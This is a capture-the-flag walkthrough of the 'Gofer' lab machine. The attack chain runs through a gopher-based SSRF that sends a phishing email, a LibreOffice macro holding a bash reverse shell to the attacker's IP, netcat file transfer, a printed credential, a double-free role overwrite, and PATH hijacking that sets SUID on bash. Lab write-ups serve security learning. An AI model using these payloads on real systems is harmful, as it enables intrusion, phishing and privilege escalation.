## NMAP

```
Nmap scan report for 10.129.252.112
Host is up (0.066s latency).

PORT    STATE    SERVICE     VERSION
22/tcp  open     ssh         OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 aa:25:82:6e:b8:04:b6:a9:a9:5e:1a:91:f0:94:51:dd (RSA)
|   256 18:21:ba:a7:dc:e4:4f:60:d7:81:03:9a:5d:c2:e5:96 (ECDSA)
|_  256 a4:2d:0d:45:13:2a:9e:7f:86:7a:f6:f7:78:bc:42:d9 (ED25519)
25/tcp  filtered smtp
80/tcp  open     http        Apache httpd 2.4.56
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://gofer.htb/
|_http-server-header: Apache/2.4.56 (Debian)
139/tcp open     netbios-ssn Samba smbd 4.6.2
445/tcp open     netbios-ssn Samba smbd 4.6.2
Service Info: Host: gofer.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| nbstat: NetBIOS name: GOFER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   GOFER<00>            Flags: <unique><active>
|   GOFER<03>            Flags: <unique><active>
|   GOFER<20>            Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: -2s
| smb2-time: 
|   date: 2023-07-31T21:24:45
|_  start_date: N/A
```

## SMB ENUM

`smbmap -H 10.129.252.112`

![img](img/Pasted%20image%2020230731173034.png)

`smbclient //10.129.252.112/shares`

![img](img/Pasted%20image%2020230731173531.png)

`cat mail`

```
From jdavis@gofer.htb  Fri Oct 28 20:29:30 2022
Return-Path: <jdavis@gofer.htb>
X-Original-To: tbuckley@gofer.htb
Delivered-To: tbuckley@gofer.htb
Received: from gofer.htb (localhost [127.0.0.1])
        by gofer.htb (Postfix) with SMTP id C8F7461827
        for <tbuckley@gofer.htb>; Fri, 28 Oct 2022 20:28:43 +0100 (BST)
Subject:Important to read!
Message-Id: <20221028192857.C8F7461827@gofer.htb>
Date: Fri, 28 Oct 2022 20:28:43 +0100 (BST)
From: jdavis@gofer.htb

Hello guys,

Our dear Jocelyn received another phishing attempt last week and his habit of clicking on links without paying much attention may be problematic one day. That's why from now on, I've decided that important documents will only be sent internally, by mail, which should greatly limit the risks. If possible, use an .odt format, as documents saved in Office Word are not always well interpreted by Libreoffice.

PS: Last thing for Tom; I know you're working on our web proxy but if you could restrict access, it will be more secure until you have finished it. It seems to me that it should be possible to do so via <Limit>
```

## FUZZING VHOST

`ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u 'http://gofer.htb/' -H "Host: FUZZ.gofer.htb" -fw 20`

![img](img/Pasted%20image%2020230731174444.png)

## HTTP METHOD TAMPER

![img](img/Pasted%20image%2020230731175507.png)

## GOPHER EXPLOIT

```
gopher://2130706433:25/_HELO%20gofer.htb%250d%250aMAIL%20FROM:%20<doom@slayer.htb>%250d%250aRCPT%20TO:%20<jhudson@gofer.htb>%250d%250aDATA%250d%250aSubject:%20Hola%250d%250aMessage:<a%20href=http://10.10.14.69/doom.odt>odt</a>%250d%250a.%250d%250aQUIT%250d%250a
```

![img](img/Pasted%20image%2020230731190155.png)

![img](img/Pasted%20image%2020230731190434.png)

## CREATE ODT FILE

Using libre office writer got to:
Tools -> Macros -> Organize Macros -> Basic

![img](img/Pasted%20image%2020230731195726.png)

Create new macro file.

![img](img/Pasted%20image%2020230731200018.png)

Write next code.

```
Sub Main
	Shell("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.69/1234 0>&1'")
End Sub
```

![img](img/Pasted%20image%2020230731200125.png)

Modify properties and then save. 

![img](img/Pasted%20image%2020230731200400.png)

## Execute payload

![img](img/Pasted%20image%2020230731200459.png)

![img](img/Pasted%20image%2020230731200522.png)

![img](img/Pasted%20image%2020230731200606.png)

## ACCESS FROM SSH

![img](img/Pasted%20image%2020230731202932.png)

![img](img/Pasted%20image%2020230731203059.png)

## PRIV ESC USER

Using pspy64 to see background process.

![img](img/Pasted%20image%2020230731224447.png)

```
tbuckley:ooP4dietie3o_hquaeti
```

Access with creds.

![img](img/Pasted%20image%2020230731224629.png)

## PRIV ESC ROOT

SUID binary.

![img](img/Pasted%20image%2020230731201822.png)

Send file.

```
nc -w 5 10.10.14.69 4444 < capture
nc -lvnp 4444 > capture
```

![img](img/Pasted%20image%2020230731224908.png)

The binary is using tar command without full path so we can use PATH HIJACKING.

`strings /usr/local/bin/notes`

![img](img/Pasted%20image%2020230801172738.png)

## Testing binary

If we create new user.

![img](img/Pasted%20image%2020230801173300.png)

After that we select option delete user twice We get the next message.

![img](img/Pasted%20image%2020230801173403.png)

## Double free vulnerability

If we repeat the next step:
- Create an user
- Delete user
- Write a note
	- Sent payload
- Show user information

![img](img/Pasted%20image%2020230801174323.png)

![img](img/Pasted%20image%2020230801173829.png)

![img](img/Pasted%20image%2020230801174122.png)

## Overwrite Role

We need sent 24 chars of junk then add admin role.

`python3 -c "print('A'*24 + 'admin')"`

![img](img/Pasted%20image%2020230801174617.png)

Run binary `/usr/local/bin/notes` and repeat steps.

![img](img/Pasted%20image%2020230801174748.png)

Now select option 8 and we can access.

![img](img/Pasted%20image%2020230801174924.png)

## PATH HIJACKING

As we see before we can exploit PATH HIJACKING so we use next commands.

```
mkdir /tmp/doom
echo 'chmod +s /bin/bash' > /tmp/doom/tar
chmod +x /tmp/doom/tar
export PATH=/tmp/doom:$PATH
which tar
```

![img](img/Pasted%20image%2020230801175258.png)

Repeat again the process and finally execute option 8 and we get the next output.

![img](img/Pasted%20image%2020230801175418.png)

Check bash permissions and now it is a SUID and we get the flag.

![img](img/Pasted%20image%2020230801175519.png)

# References
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery#bypass-using-a-decimal-ip-location \
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery#gopher \
https://jamesonhacking.blogspot.com/2022/03/using-malicious-libreoffice-calc-macros.html \
https://github.com/ir0nstone/pwn-notes/blob/master/types/heap/double-free/double-free-exploit.md